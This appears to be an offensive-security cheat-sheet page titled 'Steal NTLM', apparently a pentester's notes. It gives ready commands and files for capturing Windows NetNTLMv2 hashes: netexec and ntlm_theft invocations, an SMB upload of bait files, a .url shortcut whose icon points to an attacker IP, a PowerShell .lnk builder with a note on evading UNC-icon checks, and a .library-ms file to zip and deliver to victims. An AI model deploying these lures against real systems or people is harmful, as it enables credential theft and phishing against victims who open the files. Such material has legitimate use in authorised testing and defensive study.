Steal NTLM

Triggers implicit SMB authentication and leaks a NetNTLMv2.

nxc

netexec smb <IP> -u <USER> -p <PASS> -M slinky -o NAME=evil SHARE=<NAME_SHARE> SERVER=<MyIP>

ntlm_theft

python3 ntlm_theft.py -g all -s <IP> -f evil

# insmbclient
prompt off
mput evil/*

.url

evil.url

[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0

.lnk

$lnk = "$env:USERPROFILE\Desktop\evil.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\<IP>\share\payload.exe"  # LISTENER SERVER
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()

.library-ms ZIP

ZIP and deliver the file below

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <version>6</version>
  <name>Company Documents</name>
  <isLibraryPinned>false</isLibraryPinned>
  <iconReference>shell32.dll,-235</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\<IP>\share</url> <!-- LISTENER SERVER -->
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

https://book.hacktricks.wiki/en/windows-hardening/ntlm/places-to-steal-ntlm-creds.html

Last updated 24 days ago

hashtagnxc

hashtagntlm_theftarrow-up-right

hashtag.url

hashtag.lnk

hashtag.library-ms ZIP

nxc

ntlm_theft

.url

.lnk

.library-ms ZIP